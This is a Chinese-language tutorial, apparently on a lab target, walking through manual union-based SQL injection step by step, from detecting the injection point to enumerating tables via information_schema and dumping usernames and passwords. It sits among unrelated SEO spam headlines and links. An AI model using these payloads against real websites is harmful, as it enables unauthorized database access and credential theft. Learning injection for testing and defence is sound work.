当前位置: 首页 > news >正文

最好的做网站青岛seo整站优化公司

最好的做网站,青岛seo整站优化公司,原创小说手机网站制作需要多少钱,哪个网站卖做阳具好点目录 1.判断是否存在sql注入点 1.1我们在地址栏中输入?id1 1.2我们在地址栏中输入?id-- 2.联合查询 2.1首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。 2.2爆出显示位,就是看看表格里面哪一列是在页面显示…

目录

1.判断是否存在sql注入点

1.1我们在地址栏中输入?id=1'

1.2我们在地址栏中输入?id'--+

2.联合查询

2.1首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。

2.2爆出显示位,就是看看表格里面哪一列是在页面显示的

2.3获取当前数据名和版本号

2.4爆表

2.5爆字段名

2.6爆账号密码


1.判断是否存在sql注入点

1.1我们在地址栏中输入?id=1'

1.2我们在地址栏中输入?id'--+

根据结果可判断出是字符型注入,该页面存在回显,所以我们可以使用联合查询

1.?id=1 and 1=1 和?id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为数字型注入。

2.?id=1' and 1=1--+和?id=1' and 1=2--+进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为字符型注入。

2.联合查询

注意:联合查询两表之间列数必须相同

2.1首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。

?id=1'order by 4 --+

?id=1'order by 3 --+

根据结果可判断出此表有3列

2.2爆出显示位,就是看看表格里面哪一列是在页面显示的

?id=-1'union select 1,2,3--+

注意:union查询时,如果左右两边都为真,则返回前者查询的结果,所以要让后面我们自己构造的查询语句回显的话,前面id必须填写一个查询不到的数,这里我填的是-1

可以看到查询结果是在2和3的位置回显的,则可以将2和3替换为我们的查询语句。

2.3获取当前数据名和版本号

?id=-1'union select 1,database(),version()--+

通过结果知道当前表所处的数据库是security,版本是5.7.26

2.4爆表

mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。

在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .

这些数据库内的信息。如果information_schema库被过滤掉,还可以尝试使用下述库来代替

sys.schema_auto_increment_columns 

sys.schema_table_statistics_with_buffer

mysql.innodb_table_stats

mysql.innodb_table_index

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

根据结果可知当前security库下有四张表,并且users表最有可能存放用户信息

2.5爆字段名

我们通过sql语句查询知道当前数据库有四个表,根据表名知道可能用户的账户和密码是在users表中。接下来我们就是得到该表下的字段名以及内容。

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

此语句是查询information_schema数据库下的columns表里users的列名

注意table_name字段不是只存在于tables表,也是存在columns表中。表示所有字段对应的表名。

通过上述操作可以得到两个敏感字段就是username和password,最有可能存放用户的账号密码

2.6爆账号密码

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

这样我们就爆出各个用户的账号密码了,本次手工注入到此结束。

http://www.hrbkazy.com/news/57124.html

相关文章:

  • 海南注册公司代办关键词优化公司哪家推广
  • 哪家企业的网站做的好免费视频外链生成推荐
  • 做网站分辨率修改企业网站seo
  • 淄博网站建设设计专业的营销团队哪里找
  • 汽车可以做哪些广告视频网站有哪些网站搜索工具
  • 做汽车内饰皮革批发的网站百度推广怎么开户
  • asp网站建设实例花炮公司网站制作需要多少钱
  • flash全屏网站模板seo建站收费地震
  • 自学手机网站开发怎么把自己的产品推广出去
  • 外贸网站优化方案谷歌推广怎么操作
  • 花生壳可以做网站吗推广员网站
  • 做企业网站建设挣钱吗网站搜索引擎优化主要方法
  • wordpress网站入口百度怎么投放自己的广告
  • 怎么做网站平台潍坊网站建设公司
  • 杭州做网站的公司排行上海百度关键词搜索推广服务
  • 客户说做网站价格高app推广方案策划
  • 陕西省建设厅网站安全员报名最全磁力搜索引擎
  • 网站建设分为几个时期磁力链
  • 电商网站后台建设问题一站式海外推广平台
  • wordpress vltur优化大师的作用
  • 网站建设公司兴田德润i优惠吗夫唯seo
  • 企业建设网站公司有哪些搜索引擎优化岗位
  • 辽宁建设厅规划设计网站百度广告搜索引擎
  • 企业站seo点击软件上海百度搜索排名优化
  • 番禺有经验的网站建设亚洲7号卫星电视
  • 西安高端网站建设公司百度排行榜小说
  • H5平台网站建设长尾关键词挖掘词
  • 唐山做企业网站的公司青岛seo服务公司
  • 沧州免费网站建设百度地图人工客服电话
  • 温州网站建设优化aso优化公司